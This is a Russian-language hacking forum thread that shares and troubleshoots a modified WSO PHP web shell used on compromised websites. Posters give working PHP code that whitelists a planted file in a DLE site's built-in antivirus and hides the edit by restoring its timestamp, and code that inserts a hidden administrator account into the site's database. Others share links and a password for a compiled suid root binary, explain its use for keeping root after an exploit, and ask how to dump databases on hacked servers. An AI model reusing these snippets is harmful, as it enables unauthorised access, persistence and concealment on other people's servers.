WSO 2.5 Modified

Discussion in 'Избранное' started by randman, 6 Aug 2011.

  1. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    157
    Likes Received:
    83
    Reputations:
    78
    Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна.
    Добавлена опция дампа определенных колонок таблиц.
    Скриншот:
    [​IMG]

    Код на pastebin.com: http://pastebin.com/WvZTc46s
     
    1 person likes this.
  2. KeepInTouch

    KeepInTouch New Member

    Joined:
    14 Oct 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    В WSO из первого поста есть ошибка в параметрах:

    Правьте)
    Готовый запакованный вариант: http://pastebin.com/7fn3hebC
     
  3. spiderbuber

    spiderbuber New Member

    Joined:
    20 Oct 2010
    Messages:
    68
    Likes Received:
    0
    Reputations:
    0
    Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов..
    Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени..

    Прячем файлы от встроенного антивируса:
    PHP:
    //AV hide
    $antivir '../ajax/antivirus.php';  
    $time_create filemtime($antivir);
    $text=file_get_contents($antivir);
    $file fopen($antivir'w');  
    $text str_replace('"./engine/inc/search.php",''"./engine/inc/search.php",
        "./engine/ajax/view.php",'
    $text);
    fwrite($file$text);  
    fclose($file);
    $res=touch $antivir $time_create );
    echo 
    "AV - ok :)";
    // end //
    Создаём админа
    PHP:
    //adm
    ob_start ();
    define ("DATALIFEENGINE""1");
    include(
    "../classes/mysql.class.php");
    include(
    "dbconfig.php");
    include(
    "config.php");
    mysql_connect(DBHOSTDBUSERDBPASS);
    mysql_select_db(DBNAME);
    @
    set_time_limit(0);
    $update mysql_query("INSERT INTO `" PREFIX "_users` ( `email` , `password` , `name`, `user_group` ) VALUES ('my@mail.com', '14e1b600b1fd579f47433b88e8d85291', 'adm', '1')");
    echo 
    "adm in DB - ok :)";
    // end //
    и много других...

    Как все эти скрипты реализовать в одном?
    Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д.
    Если произошла ошибка - останавливаем и выводим на экран..
    Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно...
     
  4. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Может, это сойдёт?
    PHP:
    function DLE()
     {
    ...
     }
    if(
    DLE())
     {
    echo 
    "ok";
     }
    else{
    echo 
    "Fffuu";
    }
     
  5. SimbyOS

    SimbyOS Banned

    Joined:
    22 Nov 2011
    Messages:
    41
    Likes Received:
    5
    Reputations:
    10
    Классный шелл!
    Заливаю только этот шелл так как другие далеко позади!
     
  6. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Как сделать дамп БД через этот шелл?
     
  7. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    732
    Likes Received:
    26
    Reputations:
    -6
    как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите
     
    #47 boortyhuhtyu, 27 Nov 2011
    Last edited: 27 Nov 2011
  8. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    ссылка сдохла!
    скиньте ещё раз Скомпилированный суидник плз!
    и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
    в чём может быть проблемма?
     
    #48 Faaax, 5 Dec 2011
    Last edited: 5 Dec 2011
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Самому не скомпилить чтоли?

    1) Просто суидник: http://www.sendspace.com/file/hgwwez
    2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj

    Пасс на судник: 112s233

    Использование: ./suid 112s233 'uname -a; id'
     
  10. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    да уже скомпилил!
    но вот следующий вопрос остаётся открытым!
    после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
    в чём может быть проблемма?
    серв до сих пор лежит!
     
  11. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    276
    Likes Received:
    89
    Reputations:
    35
    глючный какой-то мод, сохранил suid, теперь на шелл не заходит:

    Query did not return anything
     
  12. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    303
    Likes Received:
    27
    Reputations:
    9
    адрес пхп неверно указал
     
  13. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Друзья, объясните дураку смысл не root суидника ?
     
  14. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, o_O - root ;)

    А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)
     
  15. edger

    edger Member

    Joined:
    9 Jul 2011
    Messages:
    86
    Likes Received:
    9
    Reputations:
    1
    Человеки добрые, подскажите в чём дело:
    На ломе прекрасно открывается данный шел из этой темы, только не работают Actions.
    Но не открывается вообще шел без модификации этой ( http://forum.antichat.ru/thread103155-wso.html ) пишет про ошибку:

    "Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
     
    #55 edger, 25 Dec 2011
    Last edited: 25 Dec 2011
  16. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.
     
  17. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Стоит скоба там, где ее не должно стоять. А именно в 595 строке. Исправь
     
  18. edger

    edger Member

    Joined:
    9 Jul 2011
    Messages:
    86
    Likes Received:
    9
    Reputations:
    1
    В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю :(
     
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).